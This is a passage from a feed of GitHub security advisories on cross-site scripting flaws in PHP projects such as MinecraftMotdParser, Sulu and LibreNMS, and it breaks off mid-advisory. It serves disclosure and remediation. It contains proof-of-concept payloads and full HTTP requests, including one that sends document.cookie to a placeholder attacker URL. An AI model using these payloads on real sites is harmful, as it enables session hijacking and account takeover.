<span class="pl-k">use</span> <span class="pl-v">DevLancer</span>\<span class="pl-v">MinecraftMotdParser</span>\<span class="pl-v">Generator</span>\<span class="pl-v">HtmlGenerator</span>;
<span class="pl-k">use</span> <span class="pl-v">DevLancer</span>\<span class="pl-v">MinecraftMotdParser</span>\<span class="pl-v">Parser</span>\<span class="pl-v">ArrayParser</span>;
<span class="pl-s1"><span class="pl-c1">$</span>motdCollection</span> = (<span class="pl-k">new</span> <span class="pl-v">ArrayParser</span>())-&gt;<span class="pl-en">parse</span>([
[
<span class="pl-s">'<span class="pl-s">color</span>'</span> =&gt; <span class="pl-s">'<span class="pl-c">#" onmouseover="javascript:alert(\'XSS when mouse pointer enters the span element\')"',</span><span class="pl-s"></span></span>
<span class="pl-s"><span class="pl-s"> </span>'text' =&gt;<span class="pl-s"> </span>'</span><span class="pl-v">Hover</span> me',
],
[
<span class="pl-s">'<span class="pl-s">color</span>'</span> =&gt; <span class="pl-s">'<span class="pl-s">#000000</span>'</span>,
<span class="pl-s">'<span class="pl-s">text</span>'</span> =&gt; <span class="pl-s">'<span class="pl-s">&lt;script&gt;alert("XSS on page load")&lt;/script&gt;</span>'</span>,
]
], <span class="pl-k">new</span> <span class="pl-v">MotdItemCollection</span>());
<span class="pl-k">echo</span> (<span class="pl-k">new</span> <span class="pl-v">HtmlGenerator</span>())-&gt;<span class="pl-en">generate</span>(<span class="pl-s1"><span class="pl-c1">$</span>motdCollection</span>);</pre></div>
<h3>Impact</h3>
<p>If the <code class="notranslate">HtmlGenerator</code> class of this library is used, this XSS vulnerability can potentially affect:</p>
<ul>
<li>Players visiting Minecraft server list websites (of which there are several dozen online, written in PHP) that display the MOTD.</li>
<li>Users visiting Minecraft server status websites to query information about a Minecraft server.</li>
<li>Server owners managing their Minecraft server via a web interface that displays the MOTD, where the attack could be carried out by a malicious Minecraft server plugin that modifies the MOTD without the server owner's consent.</li>
</ul>
<p>It is not clear if and which platforms depend on this library.</p>
<h3>Remediation</h3>
<p>I suggest converting all HTML special characters in the values of the <code class="notranslate">color</code> and <code class="notranslate">text</code> properties to HTML entities. The display of the HTML entities will still be correct in the browser, but the XSS vulnerability will be eliminated as the values will no longer be interpreted as HTML by the browser.</p>
<p>This could be achieved by introducing a new private <code class="notranslate">escape</code> function in the <code class="notranslate">HtmlGenerator</code> class:</p>
<div class="highlight highlight-text-html-php"><pre class="notranslate"><span class="pl-k">private</span> <span class="pl-k">function</span> <span class="pl-en">escape</span>(<span class="pl-smi">string</span> <span class="pl-s1"><span class="pl-c1">$</span>text</span>): <span class="pl-smi">string</span>
{
<span class="pl-k">return</span> <span class="pl-en">htmlentities</span>(<span class="pl-s1"><span class="pl-c1">$</span>text</span>, <span class="pl-c1">ENT_QUOTES</span> | <span class="pl-c1">ENT_HTML5</span>, <span class="pl-s">'<span class="pl-s">UTF-8</span>'</span>);
}</pre></div>
<p>This function should be called in the following two lines:</p>
<ul>
<li><a href="https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L49">https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L49</a><br>
Change to: <code class="notranslate">$tags['span'][] = sprintf('color: %s;', $this-&gt;escape($motdItem-&gt;getColor()));</code></li>
<li><a href="https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L80">https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L80</a><br>
Change to: <code class="notranslate">$value = sprintf($value, $this-&gt;escape($motdItem-&gt;getText()));</code></li>
</ul>
<h3>References</h3>
<ul>
<li><a title="GHSA-q898-frwq-f3qp" href="https://github.com/jgniecki/MinecraftMotdParser/security/advisories/GHSA-q898-frwq-f3qp">GHSA-q898-frwq-f3qp</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47765" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47765</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/jgniecki/MinecraftMotdParser/commit/b0ab9d68a964cd3d74977f39a9e7af0a94509f7c/hovercard" href="https://github.com/jgniecki/MinecraftMotdParser/commit/b0ab9d68a964cd3d74977f39a9e7af0a94509f7c">jgniecki/MinecraftMotdParser@<tt>b0ab9d6</tt></a></li>
<li><a href="https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L49">https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L49</a></li>
<li><a href="https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L80">https://github.com/jgniecki/MinecraftMotdParser/blob/0412f68eeb91729a00444a8d6c00c45623884aa5/src/Generator/HtmlGenerator.php#L80</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-q898-frwq-f3qp</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-q898-frwq-f3qp</guid>
<pubDate>Fri, 04 Oct 2024 18:51:35 GMT</pubDate>
</item>
<item>
<title>Injection of arbitrary HTML/JavaScript code through the media download URL</title>
<description><h3>Impact</h3>
<p>This vulnerability allows an attacker to inject arbitrary HTML/JavaScript code through the media download URL in Sulu CMS. It affects the SuluMediaBundle component. The vulnerability is a Reflected Cross-Site Scripting (XSS) issue, which could potentially allow attackers to steal sensitive information, manipulate the website's content, or perform actions on behalf of the victim.</p>
<h3>Patches</h3>
<p>The problem has not been patched yet. Users should upgrade to patched versions once they become available. Currently affected versions are:</p>
<ul>
<li>2.6.4</li>
<li>2.5.20</li>
</ul>
<h3>Workarounds</h3>
<p>Until an official patch is released, users can implement additional input validation and output encoding for the 'slug' parameter in the MediaStreamController's downloadAction method. Alternatively, configuring a Web Application Firewall (WAF) to filter potentially malicious input could serve as a temporary mitigation.</p>
<h3>References</h3>
<ul>
<li>GitHub repository: <a href="https://github.com/sulu/sulu">https://github.com/sulu/sulu</a></li>
<li>Vulnerable code: <a href="https://github.com/sulu/sulu/blob/2.6/src/Sulu/Bundle/MediaBundle/Controller/MediaStreamController.php#L106">https://github.com/sulu/sulu/blob/2.6/src/Sulu/Bundle/MediaBundle/Controller/MediaStreamController.php#L106</a></li>
</ul>
<h3>References</h3>
<ul>
<li><a title="GHSA-6784-9c82-vr85" href="https://github.com/sulu/sulu/security/advisories/GHSA-6784-9c82-vr85">GHSA-6784-9c82-vr85</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47617" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47617</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/sulu/sulu/commit/a5a5ae555d282e88ff8559d38cfb46dea7939bda/hovercard" href="https://github.com/sulu/sulu/commit/a5a5ae555d282e88ff8559d38cfb46dea7939bda">sulu/sulu@<tt>a5a5ae5</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/sulu/sulu/commit/eeacd14b6cf55f710084788140d40ebb00314b29/hovercard" href="https://github.com/sulu/sulu/commit/eeacd14b6cf55f710084788140d40ebb00314b29">sulu/sulu@<tt>eeacd14</tt></a></li>
<li><a href="https://github.com/sulu/sulu/blob/2.6/src/Sulu/Bundle/MediaBundle/Controller/MediaStreamController.php#L106">https://github.com/sulu/sulu/blob/2.6/src/Sulu/Bundle/MediaBundle/Controller/MediaStreamController.php#L106</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6784-9c82-vr85</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6784-9c82-vr85</guid>
<pubDate>Thu, 03 Oct 2024 18:26:26 GMT</pubDate>
</item>
<item>
<title>Cross-site Scripting via uploaded SVG</title>
<description><p>In Sulu v2.0.0 through v2.6.4 are vulnerable against XSS whereas a low privileged user with an access to the “Media” section can upload an SVG file with a malicious payload. Once uploaded and accessed, the malicious javascript will be executed on the victims’ (other users including admins) browsers.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-255w-87rh-rg44" href="https://github.com/sulu/sulu/security/advisories/GHSA-255w-87rh-rg44">GHSA-255w-87rh-rg44</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47618" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47618</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/sulu/sulu/commit/ca72f75eebe41ea7726624d8aea7da6c425f1eb9/hovercard" href="https://github.com/sulu/sulu/commit/ca72f75eebe41ea7726624d8aea7da6c425f1eb9">sulu/sulu@<tt>ca72f75</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-255w-87rh-rg44</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-255w-87rh-rg44</guid>
<pubDate>Thu, 03 Oct 2024 18:25:40 GMT</pubDate>
</item>
<item>
<title>Contao allows admin an account to upload SVG file containing malicious JavaScript</title>
<description><p>Contao 5.4.1 allows an authenticated admin account to upload a SVG file containing malicious javascript code into the target system. If the file is accessed through the website, it could lead to a Cross-Site Scripting (XSS) attack or execute arbitrary code via a crafted javascript to the target.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45965" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-45965</a></li>
<li><a href="https://grimthereaperteam.medium.com/contao-5-4-1-malicious-file-upload-xss-in-svg-30edb8820ecb" rel="nofollow">https://grimthereaperteam.medium.com/contao-5-4-1-malicious-file-upload-xss-in-svg-30edb8820ecb</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mrw8-5368-phm3</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mrw8-5368-phm3</guid>
<pubDate>Wed, 02 Oct 2024 21:30:36 GMT</pubDate>
</item>
<item>
<title>October allows an admin account to upload PDF containing malicious JavaScript</title>
<description><p>October 3.6.30 allows an authenticated admin account to upload a PDF file containing malicious JavaScript into the target system. If the file is accessed through the website, it could lead to a Cross-Site Scripting (XSS) attack or execute arbitrary code via a crafted JavaScript to the target.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45962" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-45962</a></li>
<li><a href="https://grimthereaperteam.medium.com/october-cms-3-6-30-stored-xss-ddf2be7a226e" rel="nofollow">https://grimthereaperteam.medium.com/october-cms-3-6-30-stored-xss-ddf2be7a226e</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hxpp-g76m-qhvg</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hxpp-g76m-qhvg</guid>
<pubDate>Wed, 02 Oct 2024 21:30:35 GMT</pubDate>
</item>
<item>
<title>Zenario allows authenticated admin users to upload PDF files containing malicious code</title>
<description><p>Zenario 9.7.61188 allows authenticated admin users to upload PDF files containing malicious code into the target system. If the PDF file is accessed through the website, it can trigger a Cross Site Scripting (XSS) attack.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45960" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-45960</a></li>
<li><a href="https://grimthereaperteam.medium.com/zenario-9-7-9-7-61188-malicious-file-upload-xss-in-pdf-eb11729fe059" rel="nofollow">https://grimthereaperteam.medium.com/zenario-9-7-9-7-61188-malicious-file-upload-xss-in-pdf-eb11729fe059</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-3636-hx62-pv26</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-3636-hx62-pv26</guid>
<pubDate>Wed, 02 Oct 2024 21:30:35 GMT</pubDate>
</item>
<item>
<title>Zenario Cross Site Scripting in the Image library</title>
<description><p>Zenario 9.7.61188 is vulnerable to Cross Site Scripting (XSS) in the Image library via the "Organizer tags" field.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45964" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-45964</a></li>
<li><a href="https://grimthereaperteam.medium.com/zenario-9-7-61188-reflect-xss-bee4ab9187e7" rel="nofollow">https://grimthereaperteam.medium.com/zenario-9-7-61188-reflect-xss-bee4ab9187e7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-2cc5-429x-p387</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-2cc5-429x-p387</guid>
<pubDate>Wed, 02 Oct 2024 21:30:35 GMT</pubDate>
</item>
<item>
<title>LibreNMS vulnerable to Stored Cross-site Scripting via File Upload</title>
<description><h3>Summary</h3>
<p>Stored Cross-Site Scripting (XSS) can archive via Uploading a new Background for a Custom Map.</p>
<h3>Details</h3>
<p>Users with "admin" role can set background for a custom map, this allow the upload of SVG file that can contain XSS payload which will trigger onload. This led to Stored Cross-Site Scripting (XSS).</p>
<h3>PoC</h3>
<ol>
<li>
<p>Login using an Admin role account.</p>
</li>
<li>
<p>Go over to "$URL/maps/custom", the Manage Custom Maps.<br>
<a target="_blank" rel="noopener noreferrer" href="https://github.com/user-attachments/assets/9d621532-7880-4010-b12d-efd377f0cfdd"><img src="https://github.com/user-attachments/assets/9d621532-7880-4010-b12d-efd377f0cfdd" alt="image" style="max-width: 100%;" referrerpolicy="no-referrer"></a></p>
</li>
<li>
<p>Create a new map then choose to edit it.</p>
</li>
<li>
<p>Choose the "Set Background" option.<br>
<a target="_blank" rel="noopener noreferrer" href="https://github.com/user-attachments/assets/dc2e9453-ef3e-4649-a42f-60b7a2ad8189"><img src="https://github.com/user-attachments/assets/dc2e9453-ef3e-4649-a42f-60b7a2ad8189" alt="image" style="max-width: 100%;" referrerpolicy="no-referrer"></a></p>
</li>
<li>
<p>Choose to upload a SVG file that have this content.</p>
</li>
</ol>
<div class="highlight highlight-text-xml-svg"><pre class="notranslate">&lt;<span class="pl-ent">svg</span> <span class="pl-e">xmlns</span>=<span class="pl-s"><span class="pl-pds">"</span>http://www.w3.org/2000/svg<span class="pl-pds">"</span></span> <span class="pl-e">onload</span>=<span class="pl-s"><span class="pl-pds">"</span>alert(document.domain)<span class="pl-pds">"</span></span>&gt;
&lt;<span class="pl-ent">circle</span> <span class="pl-e">cx</span>=<span class="pl-s"><span class="pl-pds">"</span>50<span class="pl-pds">"</span></span> <span class="pl-e">cy</span>=<span class="pl-s"><span class="pl-pds">"</span>50<span class="pl-pds">"</span></span> <span class="pl-e">r</span>=<span class="pl-s"><span class="pl-pds">"</span>40<span class="pl-pds">"</span></span> /&gt;
&lt;/<span class="pl-ent">svg</span>&gt;</pre></div>
<ol start="6">
<li>
<p>Once uploaded, there should be a link to the SVG return in the POST request to the API "$URL/maps/custom/1/background".<br>
<a target="_blank" rel="noopener noreferrer" href="https://github.com/user-attachments/assets/dc224960-0bd3-42c9-ad49-2ec85b065939"><img src="https://github.com/user-attachments/assets/dc224960-0bd3-42c9-ad49-2ec85b065939" alt="image" style="max-width: 100%;" referrerpolicy="no-referrer"></a></p>
</li>
<li>
<p>Go over to that link on browser, should see a pop-up.<br>
<a target="_blank" rel="noopener noreferrer" href="https://github.com/user-attachments/assets/47a7db14-bd89-48fe-885a-fd80a052115e"><img src="https://github.com/user-attachments/assets/47a7db14-bd89-48fe-885a-fd80a052115e" alt="image" style="max-width: 100%;" referrerpolicy="no-referrer"></a></p>
</li>
</ol>
<h3>Impact</h3>
<p>Attacker can use this to perform malicious java script code for malicious intent.<br>
This would impact other Admin role users and the Global Read role users. Normal users does not have permission to read the file, so they are not affected.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-x8gm-j36p-fppf" href="https://github.com/librenms/librenms/security/advisories/GHSA-x8gm-j36p-fppf">GHSA-x8gm-j36p-fppf</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47528" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47528</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/librenms/librenms/commit/d959bf1b366319eda16e3cd6dfda8a22beb203be/hovercard" href="https://github.com/librenms/librenms/commit/d959bf1b366319eda16e3cd6dfda8a22beb203be">librenms/librenms@<tt>d959bf1</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-x8gm-j36p-fppf</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-x8gm-j36p-fppf</guid>
<pubDate>Tue, 01 Oct 2024 22:27:32 GMT</pubDate>
</item>
<item>
<title>LibreNMS has Stored Cross-site Scripting vulnerability in "Alert Transports" feature</title>
<description><h3>Summary</h3>
<p>A Stored Cross-Site Scripting (XSS) vulnerability in the "Alert Transports" feature allows authenticated users to inject arbitrary JavaScript through the "Details" section (which contains multiple fields depending on which transport is selected at that moment). This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions.</p>
<h3>Details</h3>
<p>The vulnerability occurs when creating an alert transport. The application does not properly sanitize the user input in the "Details" field, allowing an attacker to inject and store arbitrary JavaScript. This script is then executed in the context of the page whenever the alert transport is viewed or processed.</p>
<p>For instance, the following payload can be used to trigger the XSS:<br>
<code class="notranslate">test1&lt;script&gt;{onerror=alert}throw 1337&lt;/script&gt;</code></p>
<p>When the page containing the transport details is loaded, this payload causes the browser to execute the injected script, which in this case triggers an alert popup.</p>
<p>The root cause of the vulnerability is that the application does not sanitize the value of $instance-&gt;displayDetails before appending it to the HTML output. This is demonstrated in the following code:<br>
<a href="https://github.com/librenms/librenms/blob/4777247327c793ed0a3306d0464b95176008177b/includes/html/print-alert-transports.php#L40">https://github.com/librenms/librenms/blob/4777247327c793ed0a3306d0464b95176008177b/includes/html/print-alert-transports.php#L40</a></p>
<h3>PoC</h3>
<ol>
<li>Create a new alert transport in the LibreNMS interface.</li>
<li>Depending on the transport chosen, just input the following payload in any field that ends up in the "Details" section:<br>
<code class="notranslate">test1&lt;script&gt;{onerror=alert}throw 1337&lt;/script&gt;</code></li>
<li>Save the transport and trigger the alert.</li>
<li>When the transport details are accessed, the injected script executes, displaying an alert popup.</li>
</ol>
<p>Example Request:</p>
<div class="highlight highlight-source-httpspec"><pre class="notranslate"><span class="pl-k">POST</span><span class="pl-c1"> /ajax_form.php HTTP/1.1</span>
<span class="pl-s"><span class="pl-v">Host:</span> &lt;your_host&gt;</span>
<span class="pl-s"><span class="pl-v">X-Requested-With:</span> XMLHttpRequest</span>
<span class="pl-s"><span class="pl-v">X-CSRF-TOKEN:</span> &lt;your_XSRF_token&gt;</span>
<span class="pl-s"><span class="pl-v">Content-Type:</span> application/x-www-form-urlencoded; charset=UTF-8</span>
<span class="pl-s"><span class="pl-v">Cookie:</span> &lt;your_cookie&gt;</span>
<span class="pl-ii">_token=&lt;your_token&gt;&amp;transport_id=2&amp;type=alert-transports&amp;name=Test1&amp;transport-choice=canopsis-form&amp;_token=Ep6belaqXe5qE301CGmtoOWJ71gvRfBXjRyhXEpH&amp;transport-type=canopsis&amp;canopsis-host=localhost%3Cscript%3E%7Bonerror%3Dalert%7Dthrow+1337%3C%2Fscript%3E&amp;canopsis-port=5000&amp;canopsis-user=%3Cscript%3E%7Bonerror%3Dalert%7Dthrow+1337%3C%2Fscript%3E&amp;canopsis-pass=%3Cscript%3E%7Bonerror%3Dalert%7Dthrow+1337%3C%2Fscript%3E&amp;canopsis-vhost=%3Cscript%3E%7Bonerror%3Dalert%7Dthrow+1337%3C%2Fscript%3E</span></pre></div>
<h3>Impact</h3>
<p>It could allow authenticated users to execute arbitrary JavaScript code in the context of other users' sessions. Impacted users could have their accounts compromised, enabling the attacker to perform unauthorized actions on their behalf.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-7f84-28qh-9486" href="https://github.com/librenms/librenms/security/advisories/GHSA-7f84-28qh-9486">GHSA-7f84-28qh-9486</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/librenms/librenms/commit/ee1afba003d33667981e098c83295f599d88439c/hovercard" href="https://github.com/librenms/librenms/commit/ee1afba003d33667981e098c83295f599d88439c">librenms/librenms@<tt>ee1afba</tt></a></li>
<li><a href="https://github.com/librenms/librenms/blob/4777247327c793ed0a3306d0464b95176008177b/includes/html/print-alert-transports.php#L40">https://github.com/librenms/librenms/blob/4777247327c793ed0a3306d0464b95176008177b/includes/html/print-alert-transports.php#L40</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47523" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47523</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7f84-28qh-9486</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7f84-28qh-9486</guid>
<pubDate>Tue, 01 Oct 2024 20:31:22 GMT</pubDate>
</item>
<item>
<title>LibreNMS has Stored Cross-site Scripting vulnerability in "Device Group" Name</title>
<description><h3>Summary</h3>
<p>The application fail to sanitising inputs properly and rendering the code from user input to browser which allow an attacker to execute malicious javascript code.</p>
<h3>Details</h3>
<p>User with Admin role can create a Device Groups, the application did not properly sanitize the user input in the Device Groups name, when user see the detail of the Device Group, if java script code is inside the name of the Device Groups, its will be trigger.</p>
<h3>PoC</h3>
<ol>
<li>
<p>Login as an Admin role user. Then go over to "$URL/device-groups"</p>
</li>
<li>
<p>Create a new Device Group with this payload in their name</p>
</li>
</ol>
<div class="highlight highlight-source-js"><pre class="notranslate"><span class="pl-c1">&lt;</span><span class="pl-ent">img</span> <span class="pl-c1">src</span><span class="pl-c1">=</span><span class="pl-s">"x"</span> <span class="pl-c1">onerror</span><span class="pl-c1">=</span><span class="pl-s">"alert(document.cookie)"</span><span class="pl-c1">&gt;</span></pre></div>
<p><a target="_blank" rel="noopener noreferrer" href="https://github.com/user-attachments/assets/2764b313-ee65-47e9-ab57-559d75f4575c"><img src="https://github.com/user-attachments/assets/2764b313-ee65-47e9-ab57-559d75f4575c" alt="image" style="max-width: 100%;" referrerpolicy="no-referrer"></a></p>
<ol start="3">
<li>Go over to the detail page of that Device Groups, in this case "$URL/devices/group=2". Will see a pop-up.<br>
<a target="_blank" rel="noopener noreferrer" href="https://github.com/user-attachments/assets/f743ca74-5dcb-4e72-ac56-dda2b42e2986"><img src="https://github.com/user-attachments/assets/f743ca74-5dcb-4e72-ac56-dda2b42e2986" alt="image" style="max-width: 100%;" referrerpolicy="no-referrer"></a></li>
</ol>
<h3>Impact</h3>
<p>Attacker can use this to perform malicious java script code for malicious intent.<br>
This would impact all users as anyone can have access to the detail page of the device group.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-fc38-2254-48g7" href="https://github.com/librenms/librenms/security/advisories/GHSA-fc38-2254-48g7">GHSA-fc38-2254-48g7</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/librenms/librenms/commit/d3b51560a8e2343e520d16e9adc72c6951aa91ee/hovercard" href="https://github.com/librenms/librenms/commit/d3b51560a8e2343e520d16e9adc72c6951aa91ee">librenms/librenms@<tt>d3b5156</tt></a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47524" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47524</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-fc38-2254-48g7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-fc38-2254-48g7</guid>
<pubDate>Tue, 01 Oct 2024 20:31:17 GMT</pubDate>
</item>
<item>
<title>LibreNMS has Stored Cross-site Scripting vulnerability in "Alert Rules" feature</title>
<description><h3>Summary</h3>
<p>A Stored Cross-Site Scripting (XSS) vulnerability in the "Alert Rules" feature allows authenticated users to inject arbitrary JavaScript through the "Title" field. This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions.</p>
<h3>Details</h3>
<p>The vulnerability occurs when creating an alert rule. The application does not properly sanitize user inputs in the "Title" field, which allows an attacker to escape the attribute context where the title is injected (data-content). Despite some character restrictions, the attacker can still inject a payload that leverages available attributes on the div element to execute JavaScript automatically when the page loads.</p>
<p>For example, the following payload can be used:<br>
<code class="notranslate">test1'' autofocus onfocus="document.location='https://&lt;attacker-url&gt;/logger.php?c='+document.cookie"</code></p>
<p>This payload triggers the XSS when the affected page is loaded, automatically redirecting the user to the attacker's controlled domain with any non-httponly cookies present.</p>
<p>The vulnerability stems from the application not sanitizing the value of $rule['name'] before adding it to the $enabled_msg variable. This is evident in the code:</p>
<p><a href="https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/print-alert-rules.php#L405">https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/print-alert-rules.php#L405</a></p>
<h3>PoC</h3>
<ol>
<li>Create a new alert rule in the LibreNMS interface.</li>
<li>In the "Title" field, input the following payload:<br>
<code class="notranslate">test1'' autofocus onfocus="document.location='https://&lt;attacker-url&gt;/logger.php?c='+document.cookie"</code></li>
<li>Save the rule and trigger the alert.</li>
<li>Observe that when the page loads, the injected JavaScript executes and redirects the user, sending their non-httponly cookies to the attacker's server.</li>
</ol>
<p>Example Request:</p>
<div class="highlight highlight-source-httpspec"><pre class="notranslate"><span class="pl-k">POST</span><span class="pl-c1"> /ajax_form.php HTTP/1.1</span>
<span class="pl-s"><span class="pl-v">Host:</span> &lt;your_host&gt;</span>
<span class="pl-s"><span class="pl-v">X-Requested-With:</span> XMLHttpRequest</span>
<span class="pl-s"><span class="pl-v">X-CSRF-TOKEN:</span> &lt;your_XSRF_token&gt;</span>
<span class="pl-s"><span class="pl-v">Content-Type:</span> application/x-www-form-urlencoded; charset=UTF-8</span>
<span class="pl-s"><span class="pl-v">Cookie:</span> &lt;your_cookie&gt;</span>
<span class="pl-ii">_token=&lt;your_token&gt;&amp;device_id=-1&amp;device_name=invalid+hostname&amp;rule_id=17&amp;type=alert-rules&amp;template_id=&amp;builder_json=%7B%22condition%22%3A%22AND%22%2C%22rules%22%3A%5B%7B%22id%22%3A%22access_points.accesspoint_id%22%2C%22field%22%3A%22access_points.accesspoint_id%22%2C%22type%22%3A%22string%22%2C%22input%22%3A%22text%22%2C%22operator%22%3A%22not_equal%22%2C%22value%22%3A%22test2'%5C%22%22%7D%5D%2C%22valid%22%3Atrue%7D&amp;name=test1''+autofocus+onfocus%3D%22document.location%3D'https%3A%2F%2F&lt;attacker_url&gt;%2Flogger.php%3Fc%3D'%2Bdocument.cookie%22&amp;builder_rule_0_filter=access_points.accesspoint_id&amp;builder_rule_0_operator=not_equal&amp;builder_rule_0_value_0=test2'%22&amp;severity=warning&amp;count=1&amp;delay=1m&amp;interval=5m&amp;recovery=on&amp;acknowledgement=on&amp;maps%5B%5D=1&amp;proc=&amp;notes=Test2'%22&amp;override_query=on&amp;adv_query=select+'test3'%22'%3B</span></pre></div>
<h3>Impact</h3>
<p>It could allow authenticated users to execute arbitrary JavaScript code in the context of other users' sessions. Impacted users could have their accounts compromised, enabling the attacker to perform unauthorized actions on their behalf.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-j2j9-7pr6-xqwv" href="https://github.com/librenms/librenms/security/advisories/GHSA-j2j9-7pr6-xqwv">GHSA-j2j9-7pr6-xqwv</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/librenms/librenms/commit/7620d220e48563938d869da7689b8ac3f7721490/hovercard" href="https://github.com/librenms/librenms/commit/7620d220e48563938d869da7689b8ac3f7721490">librenms/librenms@<tt>7620d22</tt></a></li>
<li><a href="https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/print-alert-rules.php#L405">https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/print-alert-rules.php#L405</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47525" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47525</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-j2j9-7pr6-xqwv</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-j2j9-7pr6-xqwv</guid>
<pubDate>Tue, 01 Oct 2024 20:31:13 GMT</pubDate>
</item>
<item>
<title>LibreNMS has Stored Cross-site Scripting vulnerability in "Alert Templates" feature</title>
<description><h3>Summary</h3>
<p>A Self Cross-Site Scripting (Self-XSS) vulnerability in the "Alert Templates" feature allows users to inject arbitrary JavaScript into the alert template's name. This script executes immediately upon submission but does not persist after a page refresh.</p>
<h3>Details</h3>
<p>The vulnerability occurs when creating an alert template in the LibreNMS interface. Although the application sanitizes the "name" field when storing it in the database, this newly created template is immediately added to the table without any sanitization being applied to the name, allowing users to inject arbitrary JavaScript. This script executes when the template is created but does not persist in the database, thus preventing stored XSS.</p>
<p>For instance, the following payload can be used to exploit the vulnerability:<br>
<code class="notranslate">test1&lt;script&gt;{onerror=alert}throw 1337&lt;/script&gt;</code></p>
<p>The root cause of this vulnerability lies in the lack of sanitization of the "name" variable before it is rendered in the table. The vulnerability exists because the bootgrid function of the jQuery grid plugin does not sanitize the text being added to the table. Although tags are stripped before being added to the database (as shown in the code below), the vulnerability still allows Self-XSS during the creation of the template.</p>
<p>Where the variable is being sanitized before being stored in the database:<br>
